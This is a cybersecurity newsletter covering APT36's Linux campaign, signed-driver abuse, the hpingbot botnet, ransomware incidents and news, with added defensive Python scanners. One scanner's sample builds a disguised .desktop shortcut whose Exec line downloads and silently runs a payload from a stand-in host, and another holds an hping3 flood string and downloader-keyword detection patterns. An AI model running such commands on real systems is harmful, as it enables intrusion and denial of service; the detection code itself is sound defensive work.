Cyber Briefing: 2025.07.07
APT36 hits Indian Linux systems, hpingbot botnet uses Pastebin, signed drivers abused for malware. Ingram Micro ransomware, Call of Duty PC RCE, EU builds quantum-safe network, Brazil insider arrested
👉 What are the latest cybersecurity alerts, incidents, and news?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please Subscribe
🚨 Cyber Alerts
1. APT36 Targets Indian Defense Linux Systems
The Pakistan-based hacking group APT36 (also known as Transparent Tribe) has shifted its tactics to target Indian defense personnel running Linux. The campaign uses phishing emails carrying weaponized ZIP files that contain a malicious Linux .desktop shortcut file. When opened, the shortcut downloads and displays a decoy document while silently executing the primary payload, a Go-based implant called BOSS.elf. The implant then performs system reconnaissance, captures screenshots, and exfiltrates the stolen data to an attacker-controlled server.
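A mail-gateway or sandbox check for the delivery mechanism described above, written as an added example (not APT36 tooling or any vendor's product): it unpacks a ZIP in memory, parses every .desktop entry, and flags shortcuts whose Exec= line calls a shell, downloader or interpreter, chains several commands, or masquerades as a document. The sample archive, its file names, the 198.51.100.10 host and the payload path are constructed for the illustration.

```python
"""Flag suspicious Linux .desktop shortcuts inside a ZIP attachment.

Added example, not part of the reported APT36 tooling. The archive built
by build_sample_zip() is constructed; its names, URLs and paths are
hypothetical.
"""
import io
import re
import zipfile
from dataclasses import dataclass, field
from typing import Optional

# Exec= values that fetch or run code instead of opening a document.
SUSPICIOUS_EXEC = re.compile(
    r"\b(bash|sh|zsh|curl|wget|python3?|perl|chmod|base64|nohup)\b"
)
CHAINING = re.compile(r"(&&|\|\||;|\||\$\()")          # several commands in one Exec=
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.I)


@dataclass
class Finding:
    member: str
    reasons: list = field(default_factory=list)


def parse_desktop(text: str) -> dict:
    """Minimal parser for the key=value pairs of the [Desktop Entry] group."""
    entries, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def assess_desktop(member: str, text: str) -> Optional[Finding]:
    e = parse_desktop(text)
    if e.get("Type", "") != "Application":
        return None
    exec_line = e.get("Exec", "")
    stem = member[: -len(".desktop")]
    reasons = []
    if SUSPICIOUS_EXEC.search(exec_line):
        reasons.append("Exec invokes shell/downloader/interpreter")
    if CHAINING.search(exec_line):
        reasons.append("Exec chains multiple commands")
    if DOC_EXT.search(stem) or DOC_EXT.search(e.get("Name", "")):
        reasons.append("shortcut masquerades as a document")
    if reasons and e.get("Terminal", "").lower() == "false":
        reasons.append("runs without a visible terminal")
    return Finding(member, reasons) if reasons else None


def scan_zip(data: bytes) -> list:
    """Return a Finding for every suspicious .desktop member of the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".desktop"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            finding = assess_desktop(info.filename, text)
            if finding:
                findings.append(finding)
    return findings


def build_sample_zip() -> bytes:
    """Constructed attachment: one decoy-plus-payload shortcut, one benign one."""
    malicious = (
        "[Desktop Entry]\nType=Application\nName=Meeting_Notice.pdf\n"
        "Icon=application-pdf\nTerminal=false\n"
        'Exec=bash -c "curl -s http://198.51.100.10/notice.pdf -o /tmp/n.pdf; '
        "xdg-open /tmp/n.pdf; curl -s http://198.51.100.10/BOSS.elf -o /tmp/.x; "
        'chmod +x /tmp/.x; nohup /tmp/.x &"\n'
    )
    benign = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %F\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Meeting_Notice.pdf.desktop", malicious)
        zf.writestr("editor.desktop", benign)
        zf.writestr("readme.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f.member, "->", "; ".join(f.reasons))
```

The check deliberately keys on behaviour (download, chaining, hidden terminal, document-looking name) rather than on a specific payload name, so it still fires when the implant file name changes.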
2. Hackers Abuse Driver Signing For Malware
Cybercriminals are exploiting legitimate Windows driver-signing processes to deploy kernel-level malware. A new investigation found that more than 620 malicious drivers and 80 compromised code-signing certificates have been used since 2020. Threat actors buy fraudulently obtained certificates on the dark web so that their malicious drivers pass signature checks and load as if they were legitimate. Ransomware gangs such as BlackCat and LockBit have used such drivers to bypass endpoint security and gain kernel-level control of victim systems.
3. hpingbot Botnet Uses Pastebin C2 Channel
A new botnet called hpingbot has been discovered targeting Windows and Linux systems in Germany, the U.S., and Turkey. Unlike traditional botnets, it uses the legitimate Pastebin platform for command and control and the hping3 packet-crafting tool to generate attack traffic. The malware fetches its instructions from hard-coded Pastebin URLs, so the operators can change payloads and commands simply by editing the paste. The botnet can launch more than ten types of DDoS attacks and is also designed to download and execute additional malware.
For more alerts, click here!
💥 Cyber Incidents
4. Ransomware Attack Causes Outage at Ingram
Global IT distributor Ingram Micro has confirmed it suffered a ransomware attack that led to an ongoing system outage. The attack, which began last Thursday, has taken the company's website and online ordering platforms offline. The ransom note is associated with the SafePay ransomware operation, and the entry point is believed to be the company's VPN. Ingram Micro has taken systems offline, launched an investigation with cybersecurity experts, and is working to restore services.
5. Call of Duty Players Hacked on Game Pass
The PC version of Call of Duty WWII has been taken offline due to reports of a critical security vulnerability. A remote code execution exploit was allowing players to take over other gamers' computers during live multiplayer matches. Attackers were able to remotely open command prompts, send messages, and even shut down the victims' personal computers. The vulnerability likely stems from the game's peer-to-peer networking and only affects PC players on platforms like Game Pass.
6. RansomHub Claims Theft of Coppell City Data
The City of Coppell, Texas, is notifying over 16,000 residents of a data breach stemming from an October 2024 cyberattack. The RansomHub ransomware gang claimed responsibility for the attack, alleging it had stolen 442 gigabytes of city data. The breach exposed residents' sensitive information, including Social Security numbers, driver's license numbers, and financial data. While the city has not confirmed the gang's claims, it is now offering impacted residents one year of free credit monitoring.
For more incidents, click here!
📢 Cyber News
7. EU Plans Quantum Secure Network by 2030
The European Union has launched a new Quantum Strategy aimed at becoming a global leader in the field by 2030. A key focus is developing quantum-secure communications to counter the future threat of quantum computers breaking current encryption. The plan includes building an EU-wide secure network called EuroQCI, which will combine terrestrial and satellite systems. This comes as governments push for post-quantum standards, while research shows most organizations have been slow to prepare.
8. Prime Day Scams Use 1000 Fake Amazon Sites
Security researchers are warning shoppers about a surge in scams ahead of Amazon Prime Day on July 8th. In June alone, over 1,000 domains impersonating Amazon were created, with 87% flagged as malicious or suspicious. Scammers use fake websites and phishing emails with urgent subject lines to steal Amazon login credentials and financial information. Consumers are urged to shop directly on Amazon's site, avoid suspicious links, and be wary of deals that seem too good to be true.
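A small classifier for the kind of Amazon-impersonating domain described above, added here as an example and not taken from the cited research: it extracts the registrable domain, checks it against an allowlist of genuine Amazon domains, and then looks for the brand string in other labels, homoglyph substitutions (0 for o, 1 for l, and so on), one- or two-character typosquats, and lure keywords. The allowlist, the suffix table and the sample host names are constructed and hypothetical.

```python
"""Score host names for Amazon impersonation.

Added example, not code from the Prime Day research. The allowlist and
the suffix table are deliberately tiny stand-ins; a real deployment would
use the Public Suffix List and the brand's full domain inventory.
"""
import re

LEGIT = {"amazon.com", "amazon.co.uk", "amazon.de", "amazon.in"}   # assumed allowlist
MULTI_PART_SUFFIXES = {"co.uk", "com.br", "co.jp"}                 # assumed subset
LURE_WORDS = ("login", "secure", "prime", "deal", "verify", "account")
# Common homoglyph/leet substitutions folded back to the letter they imitate.
HOMOGLYPH = str.maketrans("0134@$", "oleaas")


def registrable(host: str) -> str:
    """example.co.uk -> example.co.uk; www.example.com -> example.com."""
    parts = host.lower().strip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in MULTI_PART_SUFFIXES:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


def normalize(label: str) -> str:
    return label.translate(HOMOGLYPH)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch 'amazonn' / 'amzon' style typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(host: str):
    """Return a list of reasons the host looks like Amazon impersonation, or None."""
    host = host.lower().strip(".")
    reg = registrable(host)
    if reg in LEGIT:
        return None
    reasons = []
    if any("amazon" in normalize(label) for label in host.split(".")):
        reasons.append("brand string in non-Amazon domain")
    sld = reg.split(".")[0]
    if sld != "amazon" and len(sld) >= 5 and edit_distance(normalize(sld), "amazon") <= 2:
        reasons.append("typosquat of 'amazon'")
    if "amazon" in normalize(host) and "amazon" not in host:
        reasons.append("homoglyph substitution")
    if reasons and any(word in host for word in LURE_WORDS):
        reasons.append("lure keyword")
    return reasons or None


if __name__ == "__main__":
    # Constructed sample hosts; none is a real observed scam domain.
    for h in ("amazon.com", "amazon.co.uk", "amaz0n-prime-deals.com",
              "amazon.com.login-secure.net", "amazonn.com", "example.org"):
        print(f"{h:32} {assess(h)}")
```

The allowlist check comes first so that a legitimate regional domain such as amazon.co.uk is never scored; everything else is judged on the registrable domain, which is what a phishing operator actually controls.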
9. Insider Arrested in Brazil PIX System Hack
Brazilian police have arrested an employee of the technology firm C&M Software in connection with a $100 million cyberattack. The suspect, João Roque, allegedly sold his credentials to hackers who then used them to steal funds from Brazil's PIX instant payment system. The fraud, which took place in a single night, affected multiple financial institutions but not individual clients. In response, Brazil's Central Bank has suspended the company's access to the system as police continue to investigate and freeze the stolen assets.
For more news, click here!
💡 Cyber Tip
Watch Out for hpingbot Botnet Hiding Commands on Pastebin
A newly discovered botnet named hpingbot is targeting Windows, Linux, and IoT systems by abusing Pastebin to deliver its commands. The malware uses hardcoded Pastebin URLs as its command-and-control channel, making it harder to detect using traditional security tools. Infected systems can be instructed to launch over ten types of DDoS attacks or download additional malware. Researchers have observed hpingbot activity in Germany, the United States, and Turkey.
✅ What you should do:
Monitor outbound traffic for unusual connections to Pastebin or similar text-hosting platforms.
Use endpoint protection that can detect abuse of legitimate tools like hping3 and obfuscated command channels.
Regularly patch systems and secure IoT devices to prevent botnet infections.
Block or restrict access to known Pastebin URLs at the network level if not needed.
Conduct threat hunting for signs of hpingbot-specific behaviors or binaries in your environment.
🔒 Why this matters:
Hpingbot is a custom-built botnet that blends into normal traffic by using a legitimate platform for communication. Its dual use for DDoS and malware delivery makes it a high-risk threat. Staying vigilant against subtle command channels like Pastebin is essential for detecting modern botnets.
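The first, fourth and fifth items of the checklist above, and the hard-coded Pastebin URLs described in alert 3, can be turned into a concrete hunt. The following is an added example (not the hpingbot research or any vendor detection): it reads proxy log lines, groups raw-paste fetches per client, checks for a non-browser User-Agent and a regular beacon interval, correlates any later second-stage download by the same client, and separately extracts raw-paste URLs embedded in a binary. The log lines, the 203.0.113.7 host, the paste key and the fake ELF blob are all constructed for the illustration.

```python
"""Hunt for Pastebin-backed C2 of the kind hpingbot uses.

Added example; not code from the hpingbot research or a vendor product.
PROXY_LOG and SAMPLE_ELF are constructed; the hosts, paths and paste key
in them are hypothetical.
"""
import re
from collections import defaultdict

PASTE_HOSTS = {"pastebin.com", "paste.ee", "ghostbin.co", "hastebin.com", "rentry.co"}
RAW_PASTE = re.compile(r"https?://(?:www\.)?pastebin\.com/raw/[A-Za-z0-9]+")

# Constructed proxy lines: epoch_ts client method url user_agent
PROXY_LOG = """\
1751846400 10.0.0.12 GET https://pastebin.com/raw/aB3dE9fG curl/7.88.1
1751846460 10.0.0.12 GET https://pastebin.com/raw/aB3dE9fG curl/7.88.1
1751846520 10.0.0.12 GET https://pastebin.com/raw/aB3dE9fG curl/7.88.1
1751846530 10.0.0.44 GET https://pastebin.com/ Mozilla/5.0
1751846600 10.0.0.12 GET http://203.0.113.7/hping3 curl/7.88.1
1751846700 10.0.0.55 GET https://example.com/ Mozilla/5.0
"""

# Constructed stand-in for an implant: an ELF magic, padding, then two strings.
SAMPLE_ELF = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
              + b"https://pastebin.com/raw/aB3dE9fG\x00"
              + b"hping3 --flood --rand-source\x00")


def parse_proxy_log(text: str) -> list:
    rows = []
    for line in text.splitlines():
        ts, client, _method, url, ua = line.split(" ", 4)
        host = re.match(r"https?://([^/]+)", url).group(1).lower()
        rows.append({"ts": int(ts), "client": client, "url": url, "host": host, "ua": ua})
    return rows


def hunt_paste_c2(rows: list, min_hits: int = 3, max_jitter: float = 0.2) -> list:
    """One finding per client that polls raw pastes like a C2 channel."""
    by_client = defaultdict(list)
    for r in rows:
        if r["host"] in PASTE_HOSTS and "/raw/" in r["url"]:
            by_client[r["client"]].append(r)
    findings = []
    for client, hits in by_client.items():
        ts = sorted(h["ts"] for h in hits)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        regular = False
        if len(gaps) >= 2:
            mean = sum(gaps) / len(gaps)
            regular = mean > 0 and max(abs(g - mean) for g in gaps) <= max_jitter * mean
        non_browser = any(not h["ua"].startswith("Mozilla/") for h in hits)
        # Non-paste downloads by the same client after the first poll: likely stage two.
        second_stage = [r["url"] for r in rows
                        if r["client"] == client and r["host"] not in PASTE_HOSTS
                        and r["ts"] > ts[0] and not r["ua"].startswith("Mozilla/")]
        if non_browser or regular or len(hits) >= min_hits:
            findings.append({"client": client, "hits": len(hits),
                             "paste_urls": sorted({h["url"] for h in hits}),
                             "regular_beacon": regular, "non_browser_ua": non_browser,
                             "second_stage": second_stage})
    return findings


def hardcoded_paste_urls(blob: bytes) -> list:
    """Extract raw-paste URLs from the printable strings of a binary."""
    found = set()
    for s in re.findall(rb"[\x20-\x7e]{8,}", blob):
        found.update(m.group(0) for m in RAW_PASTE.finditer(s.decode("ascii")))
    return sorted(found)


if __name__ == "__main__":
    for f in hunt_paste_c2(parse_proxy_log(PROXY_LOG)):
        print(f)
    print(hardcoded_paste_urls(SAMPLE_ELF))
```

The browsing client 10.0.0.44 that only opens the Pastebin front page is not flagged; what stands out is a raw-paste URL fetched by a command-line User-Agent on a fixed interval, followed by a download from an unrelated host. Wire the URLs returned by hardcoded_paste_urls() into the network-level block from the checklist once the paste is confirmed malicious.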
📚 Cyber Book
The Home Network Manual: The Complete Guide to Setting Up, Upgrading, and Securing Your Home Network (Home Technology Manuals) by Marlon Buchanan
That concludes today’s briefing. You can check the top headlines here!
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.